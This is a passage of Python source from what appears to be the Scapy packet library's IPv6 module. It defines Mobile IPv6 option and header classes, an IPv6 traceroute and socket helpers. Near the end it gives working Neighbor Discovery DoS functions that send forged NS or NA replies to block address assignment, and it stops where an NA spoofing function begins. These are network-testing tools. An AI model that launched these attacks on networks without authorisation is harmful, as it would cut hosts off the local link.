2832 XShortField("cksum", None),
2833 XShortField("id", None),
2834 BitEnumField("R", 1, 1, {1: 'MR'}),
2835 XBitField("res", 0, 15),
2836 IP6ListField('addresses', None)]
2838 def hashret(self):
2839 return struct.pack("!H", self.id) + self.payload.hashret()
2841 def answers(self, other):
2842 if not isinstance(other, ICMPv6HAADRequest):
2843 return 0
2844 return self.id == other.id
2847class ICMPv6MPSol(_ICMPv6):
2848 name = 'ICMPv6 Mobile Prefix Solicitation'
2849 fields_desc = [ByteEnumField("type", 146, icmp6types),
2850 ByteField("code", 0),
2851 XShortField("cksum", None),
2852 XShortField("id", None),
2853 XShortField("res", 0)]
2855 def _hashret(self):
2856 return struct.pack("!H", self.id)
2859class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2860 name = 'ICMPv6 Mobile Prefix Advertisement'
2861 fields_desc = [ByteEnumField("type", 147, icmp6types),
2862 ByteField("code", 0),
2863 XShortField("cksum", None),
2864 XShortField("id", None),
2865 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}),
2866 XBitField("res", 0, 14)]
2868 def hashret(self):
2869 return struct.pack("!H", self.id)
2871 def answers(self, other):
2872 return isinstance(other, ICMPv6MPSol)
2874# Mobile IPv6 Options classes
2877_mobopttypes = {2: "Binding Refresh Advice",
2878 3: "Alternate Care-of Address",
2879 4: "Nonce Indices",
2880 5: "Binding Authorization Data",
2881 6: "Mobile Network Prefix (RFC3963)",
2882 7: "Link-Layer Address (RFC4068)",
2883 8: "Mobile Node Identifier (RFC4283)",
2884 9: "Mobility Message Authentication (RFC4285)",
2885 10: "Replay Protection (RFC4285)",
2886 11: "CGA Parameters Request (RFC4866)",
2887 12: "CGA Parameters (RFC4866)",
2888 13: "Signature (RFC4866)",
2889 14: "Home Keygen Token (RFC4866)",
2890 15: "Care-of Test Init (RFC4866)",
2891 16: "Care-of Test (RFC4866)"}
2894class _MIP6OptAlign(Packet):
2895 """ Mobile IPv6 options have alignment requirements of the form x*n+y.
2896 This class is inherited by all MIPv6 options to help in computing the
2897 required Padding for that option, i.e. the need for a Pad1 or PadN
2898 option before it. They only need to provide x and y as class
2899 parameters. (x=0 and y=0 are used when no alignment is required)"""
2901 __slots__ = ["x", "y"]
2903 def alignment_delta(self, curpos):
2904 x = self.x
2905 y = self.y
2906 if x == 0 and y == 0:
2907 return 0
2908 delta = x * ((curpos - y + x - 1) // x) + y - curpos
2909 return delta
2911 def extract_padding(self, p):
2912 return b"", p
2915class MIP6OptBRAdvice(_MIP6OptAlign):
2916 name = 'Mobile IPv6 Option - Binding Refresh Advice'
2917 fields_desc = [ByteEnumField('otype', 2, _mobopttypes),
2918 ByteField('olen', 2),
2919 ShortField('rinter', 0)]
2920 x = 2
2921 y = 0 # alignment requirement: 2n
2924class MIP6OptAltCoA(_MIP6OptAlign):
2925 name = 'MIPv6 Option - Alternate Care-of Address'
2926 fields_desc = [ByteEnumField('otype', 3, _mobopttypes),
2927 ByteField('olen', 16),
2928 IP6Field("acoa", "::")]
2929 x = 8
2930 y = 6 # alignment requirement: 8n+6
2933class MIP6OptNonceIndices(_MIP6OptAlign):
2934 name = 'MIPv6 Option - Nonce Indices'
2935 fields_desc = [ByteEnumField('otype', 4, _mobopttypes),
2936 ByteField('olen', 16),
2937 ShortField('hni', 0),
2938 ShortField('coni', 0)]
2939 x = 2
2940 y = 0 # alignment requirement: 2n
2943class MIP6OptBindingAuthData(_MIP6OptAlign):
2944 name = 'MIPv6 Option - Binding Authorization Data'
2945 fields_desc = [ByteEnumField('otype', 5, _mobopttypes),
2946 ByteField('olen', 16),
2947 BitField('authenticator', 0, 96)]
2948 x = 8
2949 y = 2 # alignment requirement: 8n+2
2952class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963
2953 name = 'NEMO Option - Mobile Network Prefix'
2954 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
2955 ByteField("olen", 18),
2956 ByteField("reserved", 0),
2957 ByteField("plen", 64),
2958 IP6Field("prefix", "::")]
2959 x = 8
2960 y = 4 # alignment requirement: 8n+4
2963class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068
2964 name = "MIPv6 Option - Link-Layer Address (MH-LLA)"
2965 fields_desc = [ByteEnumField("otype", 7, _mobopttypes),
2966 ByteField("olen", 7),
2967 ByteEnumField("ocode", 2, _rfc4068_lla_optcode),
2968 ByteField("pad", 0),
2969 MACField("lla", ETHER_ANY)] # Only support ethernet
2970 x = 0
2971 y = 0 # alignment requirement: none
2974class MIP6OptMNID(_MIP6OptAlign): # RFC 4283
2975 name = "MIPv6 Option - Mobile Node Identifier"
2976 fields_desc = [ByteEnumField("otype", 8, _mobopttypes),
2977 FieldLenField("olen", None, length_of="id", fmt="B",
2978 adjust=lambda pkt, x: x + 1),
2979 ByteEnumField("subtype", 1, {1: "NAI"}),
2980 StrLenField("id", "",
2981 length_from=lambda pkt: pkt.olen - 1)]
2982 x = 0
2983 y = 0 # alignment requirement: none
2985# We only support decoding and basic build. Automatic HMAC computation is
2986# too much work for our current needs. It is left to the user (I mean ...
2987# you). --arno
2990class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5)
2991 name = "MIPv6 Option - Mobility Message Authentication"
2992 fields_desc = [ByteEnumField("otype", 9, _mobopttypes),
2993 FieldLenField("olen", None, length_of="authdata", fmt="B",
2994 adjust=lambda pkt, x: x + 5),
2995 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501
2996 2: "MN-AAA authentication mobility option"}), # noqa: E501
2997 IntField("mspi", None),
2998 StrLenField("authdata", "A" * 12,
2999 length_from=lambda pkt: pkt.olen - 5)]
3000 x = 4
3001 y = 1 # alignment requirement: 4n+1
3003# Extracted from RFC 1305 (NTP) :
3004# NTP timestamps are represented as a 64-bit unsigned fixed-point number,
3005# in seconds relative to 0h on 1 January 1900. The integer part is in the
3006# first 32 bits and the fraction part in the last 32 bits.
3009class NTPTimestampField(LongField):
3010 def i2repr(self, pkt, x):
3011 if x < ((50 * 31536000) << 32):
3012 return "Some date a few decades ago (%d)" % x
3014 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to
3015 # January 1st 1970 :
3016 delta = -2209075761
3017 i = int(x >> 32)
3018 j = float(x & 0xffffffff) * 2.0**-32
3019 res = i + j + delta
3020 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res))
3022 return "%s (%d)" % (t, x)
3025class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6)
3026 name = "MIPv6 option - Replay Protection"
3027 fields_desc = [ByteEnumField("otype", 10, _mobopttypes),
3028 ByteField("olen", 8),
3029 NTPTimestampField("timestamp", 0)]
3030 x = 8
3031 y = 2 # alignment requirement: 8n+2
3034class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6)
3035 name = "MIPv6 option - CGA Parameters Request"
3036 fields_desc = [ByteEnumField("otype", 11, _mobopttypes),
3037 ByteField("olen", 0)]
3038 x = 0
3039 y = 0 # alignment requirement: none
3041# XXX TODO: deal with CGA param fragmentation and build of defragmented
3042# XXX version. Passing of a big CGAParam structure should be
3043# XXX simplified. Make it hold packets, by the way --arno
3046class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1)
3047 name = "MIPv6 option - CGA Parameters"
3048 fields_desc = [ByteEnumField("otype", 12, _mobopttypes),
3049 FieldLenField("olen", None, length_of="cgaparams", fmt="B"),
3050 StrLenField("cgaparams", "",
3051 length_from=lambda pkt: pkt.olen)]
3052 x = 0
3053 y = 0 # alignment requirement: none
3056class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2)
3057 name = "MIPv6 option - Signature"
3058 fields_desc = [ByteEnumField("otype", 13, _mobopttypes),
3059 FieldLenField("olen", None, length_of="sig", fmt="B"),
3060 StrLenField("sig", "",
3061 length_from=lambda pkt: pkt.olen)]
3062 x = 0
3063 y = 0 # alignment requirement: none
3066class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3)
3067 name = "MIPv6 option - Home Keygen Token"
3068 fields_desc = [ByteEnumField("otype", 14, _mobopttypes),
3069 FieldLenField("olen", None, length_of="hkt", fmt="B"),
3070 StrLenField("hkt", "",
3071 length_from=lambda pkt: pkt.olen)]
3072 x = 0
3073 y = 0 # alignment requirement: none
3076class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4)
3077 name = "MIPv6 option - Care-of Test Init"
3078 fields_desc = [ByteEnumField("otype", 15, _mobopttypes),
3079 ByteField("olen", 0)]
3080 x = 0
3081 y = 0 # alignment requirement: none
3084class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5)
3085 name = "MIPv6 option - Care-of Test"
3086 fields_desc = [ByteEnumField("otype", 16, _mobopttypes),
3087 FieldLenField("olen", None, length_of="cokt", fmt="B"),
3088 StrLenField("cokt", b'\x00' * 8,
3089 length_from=lambda pkt: pkt.olen)]
3090 x = 0
3091 y = 0 # alignment requirement: none
3094class MIP6OptUnknown(_MIP6OptAlign):
3095 name = 'Scapy6 - Unknown Mobility Option'
3096 fields_desc = [ByteEnumField("otype", 6, _mobopttypes),
3097 FieldLenField("olen", None, length_of="odata", fmt="B"),
3098 StrLenField("odata", "",
3099 length_from=lambda pkt: pkt.olen)]
3100 x = 0
3101 y = 0 # alignment requirement: none
3103 @classmethod
3104 def dispatch_hook(cls, _pkt=None, *_, **kargs):
3105 if _pkt:
3106 o = orb(_pkt[0]) # Option type
3107 if o in moboptcls:
3108 return moboptcls[o]
3109 return cls
3112moboptcls = {0: Pad1,
3113 1: PadN,
3114 2: MIP6OptBRAdvice,
3115 3: MIP6OptAltCoA,
3116 4: MIP6OptNonceIndices,
3117 5: MIP6OptBindingAuthData,
3118 6: MIP6OptMobNetPrefix,
3119 7: MIP6OptLLAddr,
3120 8: MIP6OptMNID,
3121 9: MIP6OptMsgAuth,
3122 10: MIP6OptReplayProtection,
3123 11: MIP6OptCGAParamsReq,
3124 12: MIP6OptCGAParams,
3125 13: MIP6OptSignature,
3126 14: MIP6OptHomeKeygenToken,
3127 15: MIP6OptCareOfTestInit,
3128 16: MIP6OptCareOfTest}
3131# Main Mobile IPv6 Classes
3133mhtypes = {0: 'BRR',
3134 1: 'HoTI',
3135 2: 'CoTI',
3136 3: 'HoT',
3137 4: 'CoT',
3138 5: 'BU',
3139 6: 'BA',
3140 7: 'BE',
3141 8: 'Fast BU',
3142 9: 'Fast BA',
3143 10: 'Fast NA'}
3145# From http://www.iana.org/assignments/mobility-parameters
3146bastatus = {0: 'Binding Update accepted',
3147 1: 'Accepted but prefix discovery necessary',
3148 128: 'Reason unspecified',
3149 129: 'Administratively prohibited',
3150 130: 'Insufficient resources',
3151 131: 'Home registration not supported',
3152 132: 'Not home subnet',
3153 133: 'Not home agent for this mobile node',
3154 134: 'Duplicate Address Detection failed',
3155 135: 'Sequence number out of window',
3156 136: 'Expired home nonce index',
3157 137: 'Expired care-of nonce index',
3158 138: 'Expired nonces',
3159 139: 'Registration type change disallowed',
3160 140: 'Mobile Router Operation not permitted',
3161 141: 'Invalid Prefix',
3162 142: 'Not Authorized for Prefix',
3163 143: 'Forwarding Setup failed (prefixes missing)',
3164 144: 'MIPV6-ID-MISMATCH',
3165 145: 'MIPV6-MESG-ID-REQD',
3166 146: 'MIPV6-AUTH-FAIL',
3167 147: 'Permanent home keygen token unavailable',
3168 148: 'CGA and signature verification failed',
3169 149: 'Permanent home keygen token exists',
3170 150: 'Non-null home nonce index expected'}
3173class _MobilityHeader(Packet):
3174 name = 'Dummy IPv6 Mobility Header'
3175 overload_fields = {IPv6: {"nh": 135}}
3177 def post_build(self, p, pay):
3178 p += pay
3179 tmp_len = self.len
3180 if self.len is None:
3181 tmp_len = (len(p) - 8) // 8
3182 p = p[:1] + struct.pack("B", tmp_len) + p[2:]
3183 if self.cksum is None:
3184 cksum = in6_chksum(135, self.underlayer, p)
3185 else:
3186 cksum = self.cksum
3187 p = p[:4] + struct.pack("!H", cksum) + p[6:]
3188 return p
3191class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg
3192 name = "IPv6 Mobility Header - Generic Message"
3193 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3194 ByteField("len", None),
3195 ByteEnumField("mhtype", None, mhtypes),
3196 ByteField("res", None),
3197 XShortField("cksum", None),
3198 StrLenField("msg", b"\x00" * 2,
3199 length_from=lambda pkt: 8 * pkt.len - 6)]
3202class MIP6MH_BRR(_MobilityHeader):
3203 name = "IPv6 Mobility Header - Binding Refresh Request"
3204 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3205 ByteField("len", None),
3206 ByteEnumField("mhtype", 0, mhtypes),
3207 ByteField("res", None),
3208 XShortField("cksum", None),
3209 ShortField("res2", None),
3210 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3211 _OptionsField("options", [], MIP6OptUnknown, 8,
3212 length_from=lambda pkt: 8 * pkt.len)]
3213 overload_fields = {IPv6: {"nh": 135}}
3215 def hashret(self):
3216 # Hack: BRR, BU and BA have the same hashret that returns the same
3217 # value b"\x00\x08\x09" (concatenation of mhtypes). This is
3218 # because we need match BA with BU and BU with BRR. --arno
3219 return b"\x00\x08\x09"
3222class MIP6MH_HoTI(_MobilityHeader):
3223 name = "IPv6 Mobility Header - Home Test Init"
3224 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3225 ByteField("len", None),
3226 ByteEnumField("mhtype", 1, mhtypes),
3227 ByteField("res", None),
3228 XShortField("cksum", None),
3229 StrFixedLenField("reserved", b"\x00" * 2, 2),
3230 StrFixedLenField("cookie", b"\x00" * 8, 8),
3231 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3232 _OptionsField("options", [], MIP6OptUnknown, 16,
3233 length_from=lambda pkt: 8 * (pkt.len - 1))]
3234 overload_fields = {IPv6: {"nh": 135}}
3236 def hashret(self):
3237 return bytes_encode(self.cookie)
3240class MIP6MH_CoTI(MIP6MH_HoTI):
3241 name = "IPv6 Mobility Header - Care-of Test Init"
3242 mhtype = 2
3244 def hashret(self):
3245 return bytes_encode(self.cookie)
3248class MIP6MH_HoT(_MobilityHeader):
3249 name = "IPv6 Mobility Header - Home Test"
3250 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3251 ByteField("len", None),
3252 ByteEnumField("mhtype", 3, mhtypes),
3253 ByteField("res", None),
3254 XShortField("cksum", None),
3255 ShortField("index", None),
3256 StrFixedLenField("cookie", b"\x00" * 8, 8),
3257 StrFixedLenField("token", b"\x00" * 8, 8),
3258 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3259 _OptionsField("options", [], MIP6OptUnknown, 24,
3260 length_from=lambda pkt: 8 * (pkt.len - 2))]
3261 overload_fields = {IPv6: {"nh": 135}}
3263 def hashret(self):
3264 return bytes_encode(self.cookie)
3266 def answers(self, other):
3267 if (isinstance(other, MIP6MH_HoTI) and
3268 self.cookie == other.cookie):
3269 return 1
3270 return 0
3273class MIP6MH_CoT(MIP6MH_HoT):
3274 name = "IPv6 Mobility Header - Care-of Test"
3275 mhtype = 4
3277 def hashret(self):
3278 return bytes_encode(self.cookie)
3280 def answers(self, other):
3281 if (isinstance(other, MIP6MH_CoTI) and
3282 self.cookie == other.cookie):
3283 return 1
3284 return 0
3287class LifetimeField(ShortField):
3288 def i2repr(self, pkt, x):
3289 return "%d sec" % (4 * x)
3292class MIP6MH_BU(_MobilityHeader):
3293 name = "IPv6 Mobility Header - Binding Update"
3294 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3295 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3296 ByteEnumField("mhtype", 5, mhtypes),
3297 ByteField("res", None),
3298 XShortField("cksum", None),
3299 XShortField("seq", None), # TODO: ShortNonceField
3300 FlagsField("flags", "KHA", 7, "PRMKLHA"),
3301 XBitField("reserved", 0, 9),
3302 LifetimeField("mhtime", 3), # unit == 4 seconds
3303 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3304 _OptionsField("options", [], MIP6OptUnknown, 12,
3305 length_from=lambda pkt: 8 * pkt.len - 4)]
3306 overload_fields = {IPv6: {"nh": 135}}
3308 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3309 return b"\x00\x08\x09"
3311 def answers(self, other):
3312 if isinstance(other, MIP6MH_BRR):
3313 return 1
3314 return 0
3317class MIP6MH_BA(_MobilityHeader):
3318 name = "IPv6 Mobility Header - Binding ACK"
3319 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3320 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3321 ByteEnumField("mhtype", 6, mhtypes),
3322 ByteField("res", None),
3323 XShortField("cksum", None),
3324 ByteEnumField("status", 0, bastatus),
3325 FlagsField("flags", "K", 3, "PRK"),
3326 XBitField("res2", None, 5),
3327 XShortField("seq", None), # TODO: ShortNonceField
3328 XShortField("mhtime", 0), # unit == 4 seconds
3329 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501
3330 _OptionsField("options", [], MIP6OptUnknown, 12,
3331 length_from=lambda pkt: 8 * pkt.len - 4)]
3332 overload_fields = {IPv6: {"nh": 135}}
3334 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret()
3335 return b"\x00\x08\x09"
3337 def answers(self, other):
3338 if (isinstance(other, MIP6MH_BU) and
3339 other.mhtype == 5 and
3340 self.mhtype == 6 and
3341 other.flags & 0x1 and # Ack request flags is set
3342 self.seq == other.seq):
3343 return 1
3344 return 0
3347_bestatus = {1: 'Unknown binding for Home Address destination option',
3348 2: 'Unrecognized MH Type value'}
3350# TODO: match Binding Error to its stimulus
3353class MIP6MH_BE(_MobilityHeader):
3354 name = "IPv6 Mobility Header - Binding Error"
3355 fields_desc = [ByteEnumField("nh", 59, ipv6nh),
3356 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501
3357 ByteEnumField("mhtype", 7, mhtypes),
3358 ByteField("res", 0),
3359 XShortField("cksum", None),
3360 ByteEnumField("status", 0, _bestatus),
3361 ByteField("reserved", 0),
3362 IP6Field("ha", "::"),
3363 _OptionsField("options", [], MIP6OptUnknown, 24,
3364 length_from=lambda pkt: 8 * (pkt.len - 2))]
3365 overload_fields = {IPv6: {"nh": 135}}
3368_mip6_mhtype2cls = {0: MIP6MH_BRR,
3369 1: MIP6MH_HoTI,
3370 2: MIP6MH_CoTI,
3371 3: MIP6MH_HoT,
3372 4: MIP6MH_CoT,
3373 5: MIP6MH_BU,
3374 6: MIP6MH_BA,
3375 7: MIP6MH_BE}
3378#############################################################################
3379#############################################################################
3380# Traceroute6 #
3381#############################################################################
3382#############################################################################
3384class AS_resolver6(AS_resolver_riswhois):
3385 def _resolve_one(self, ip):
3386 """
3387 overloaded version to provide a Whois resolution on the
3388 embedded IPv4 address if the address is 6to4 or Teredo.
3389 Otherwise, the native IPv6 address is passed.
3390 """
3392 if in6_isaddr6to4(ip): # for 6to4, use embedded @
3393 tmp = inet_pton(socket.AF_INET6, ip)
3394 addr = inet_ntop(socket.AF_INET, tmp[2:6])
3395 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address
3396 addr = teredoAddrExtractInfo(ip)[2]
3397 else:
3398 addr = ip
3400 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)
3402 if asn.startswith("AS"):
3403 try:
3404 asn = int(asn[2:])
3405 except ValueError:
3406 pass
3408 return ip, asn, desc
3411class TracerouteResult6(TracerouteResult):
3412 __slots__ = []
3414 def show(self):
3415 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501
3416 s.hlim,
3417 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501
3418 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501
3419 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501
3420 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501
3422 def get_trace(self):
3423 trace = {}
3425 for s, r in self.res:
3426 if IPv6 not in s:
3427 continue
3428 d = s[IPv6].dst
3429 if d not in trace:
3430 trace[d] = {}
3432 t = not (ICMPv6TimeExceeded in r or
3433 ICMPv6DestUnreach in r or
3434 ICMPv6PacketTooBig in r or
3435 ICMPv6ParamProblem in r)
3437 trace[d][s[IPv6].hlim] = r[IPv6].src, t
3439 for k in trace.values():
3440 try:
3441 m = min(x for x, y in k.items() if y[1])
3442 except ValueError:
3443 continue
3444 for li in list(k): # use list(): k is modified in the loop
3445 if li > m:
3446 del k[li]
3448 return trace
3450 def graph(self, ASres=AS_resolver6(), **kargs):
3451 TracerouteResult.graph(self, ASres=ASres, **kargs)
3454@conf.commands.register
3455def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
3456 l4=None, timeout=2, verbose=None, **kargs):
3457 """Instant TCP traceroute using IPv6
3458 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
3459 """
3460 if verbose is None:
3461 verbose = conf.verb
3463 if l4 is None:
3464 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501
3465 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501
3466 else:
3467 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4,
3468 timeout=timeout, verbose=verbose, **kargs)
3470 a = TracerouteResult6(a.res)
3472 if verbose:
3473 a.show()
3475 return a, b
3477#############################################################################
3478#############################################################################
3479# Sockets #
3480#############################################################################
3481#############################################################################
3484if not WINDOWS:
3485 from scapy.supersocket import L3RawSocket
3487 class L3RawSocket6(L3RawSocket):
3488 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501
3489 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501
3490 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501
3491 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501
3492 self.iface = iface
3495def IPv6inIP(dst='203.178.135.36', src=None):
3496 _IPv6inIP.dst = dst
3497 _IPv6inIP.src = src
3498 if not conf.L3socket == _IPv6inIP:
3499 _IPv6inIP.cls = conf.L3socket
3500 else:
3501 del conf.L3socket
3502 return _IPv6inIP
3505class _IPv6inIP(SuperSocket):
3506 dst = '127.0.0.1'
3507 src = None
3508 cls = None
3510 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501
3511 SuperSocket.__init__(self, family, type, proto)
3512 self.worker = self.cls(**args)
3514 def set(self, dst, src=None):
3515 _IPv6inIP.src = src
3516 _IPv6inIP.dst = dst
3518 def nonblock_recv(self):
3519 p = self.worker.nonblock_recv()
3520 return self._recv(p)
3522 def recv(self, x):
3523 p = self.worker.recv(x)
3524 return self._recv(p, x)
3526 def _recv(self, p, x=MTU):
3527 if p is None:
3528 return p
3529 elif isinstance(p, IP):
3530 # TODO: verify checksum
3531 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6:
3532 if isinstance(p.payload, IPv6):
3533 return p.payload
3534 return p
3536 def send(self, x):
3537 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501
3540#############################################################################
3541#############################################################################
3542# Neighbor Discovery Protocol Attacks #
3543#############################################################################
3544#############################################################################
3546def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
3547 tgt_filter=None, reply_mac=None):
3548 """
3549 Internal generic helper accepting a specific callback as first argument,
3550 for NS or NA reply. See the two specific functions below.
3551 """
3553 def is_request(req, mac_src_filter, tgt_filter):
3554 """
3555 Check if packet req is a request
3556 """
3558 # Those simple checks are based on Section 5.4.2 of RFC 4862
3559 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
3560 return 0
3562 # Get and compare the MAC address
3563 mac_src = req[Ether].src
3564 if mac_src_filter and mac_src != mac_src_filter:
3565 return 0
3567 # Source must be the unspecified address
3568 if req[IPv6].src != "::":
3569 return 0
3571 # Check destination is the link-local solicited-node multicast
3572 # address associated with target address in received NS
3573 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
3574 if tgt_filter and tgt != tgt_filter:
3575 return 0
3576 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
3577 expected_snma = in6_getnsma(tgt)
3578 if received_snma != expected_snma:
3579 return 0
3581 return 1
3583 if not iface:
3584 iface = conf.iface
3586 # To prevent sniffing our own traffic
3587 if not reply_mac:
3588 reply_mac = get_if_hwaddr(iface)
3589 sniff_filter = "icmp6 and not ether src %s" % reply_mac
3591 sniff(store=0,
3592 filter=sniff_filter,
3593 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
3594 prn=lambda x: reply_callback(x, reply_mac, iface),
3595 iface=iface)
3598def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
3599 reply_mac=None):
3600 """
3601 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3602 3756. This is done by listening incoming NS messages sent from the
3603 unspecified address and sending a NS reply for the target address,
3604 leading the peer to believe that another node is also performing DAD
3605 for that address.
3607 By default, the fake NS sent to create the DoS uses:
3608 - as target address the target address found in received NS.
3609 - as IPv6 source address: the unspecified address (::).
3610 - as IPv6 destination address: the link-local solicited-node multicast
3611 address derived from the target address in received NS.
3612 - the mac address of the interface as source (or reply_mac, see below).
3613 - the multicast mac address derived from the solicited node multicast
3614 address used as IPv6 destination address.
3616 Following arguments can be used to change the behavior:
3618 iface: a specific interface (e.g. "eth0") of the system on which the
3619 DoS should be launched. If None is provided conf.iface is used.
3621 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3622 Only NS messages received from this source will trigger replies.
3623 This allows limiting the effects of the DoS to a single target by
3624 filtering on its mac address. The default value is None: the DoS
3625 is not limited to a specific mac address.
3627 tgt_filter: Same as previous but for a specific target IPv6 address for
3628 received NS. If the target address in the NS message (not the IPv6
3629 destination address) matches that address, then a fake reply will
3630 be sent, i.e. the emitter will be a target of the DoS.
3632 reply_mac: allow specifying a specific source mac address for the reply,
3633 i.e. to prevent the use of the mac address of the interface.
3634 """
3636 def ns_reply_callback(req, reply_mac, iface):
3637 """
3638 Callback that reply to a NS by sending a similar NS
3639 """
3641 # Let's build a reply and send it
3642 mac = req[Ether].src
3643 dst = req[IPv6].dst
3644 tgt = req[ICMPv6ND_NS].tgt
3645 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501
3646 sendp(rep, iface=iface, verbose=0)
3648 print("Reply NS for target address %s (received from %s)" % (tgt, mac))
3650 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
3651 tgt_filter, reply_mac)
3654def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
3655 reply_mac=None):
3656 """
3657 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
3658 3756. This is done by listening incoming NS messages *sent from the
3659 unspecified address* and sending a NA reply for the target address,
3660 leading the peer to believe that another node is also performing DAD
3661 for that address.
3663 By default, the fake NA sent to create the DoS uses:
3664 - as target address the target address found in received NS.
3665 - as IPv6 source address: the target address found in received NS.
3666 - as IPv6 destination address: the link-local solicited-node multicast
3667 address derived from the target address in received NS.
3668 - the mac address of the interface as source (or reply_mac, see below).
3669 - the multicast mac address derived from the solicited node multicast
3670 address used as IPv6 destination address.
3671 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
3672 with the mac address used as source of the NA.
3674 Following arguments can be used to change the behavior:
3676 iface: a specific interface (e.g. "eth0") of the system on which the
3677 DoS should be launched. If None is provided conf.iface is used.
3679 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
3680 Only NS messages received from this source will trigger replies.
3681 This allows limiting the effects of the DoS to a single target by
3682 filtering on its mac address. The default value is None: the DoS
3683 is not limited to a specific mac address.
3685 tgt_filter: Same as previous but for a specific target IPv6 address for
3686 received NS. If the target address in the NS message (not the IPv6
3687 destination address) matches that address, then a fake reply will
3688 be sent, i.e. the emitter will be a target of the DoS.
3690 reply_mac: allow specifying a specific source mac address for the reply,
3691 i.e. to prevent the use of the mac address of the interface. This
3692 address will also be used in the Target Link-Layer Address option.
3693 """
3695 def na_reply_callback(req, reply_mac, iface):
3696 """
3697 Callback that reply to a NS with a NA
3698 """
3700 # Let's build a reply and send it
3701 mac = req[Ether].src
3702 dst = req[IPv6].dst
3703 tgt = req[ICMPv6ND_NS].tgt
3704 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst)
3705 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741
3706 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
3707 sendp(rep, iface=iface, verbose=0)
3709 print("Reply NA for target address %s (received from %s)" % (tgt, mac))
3711 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
3712 tgt_filter, reply_mac)
3715def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
3716 reply_mac=None, router=False):
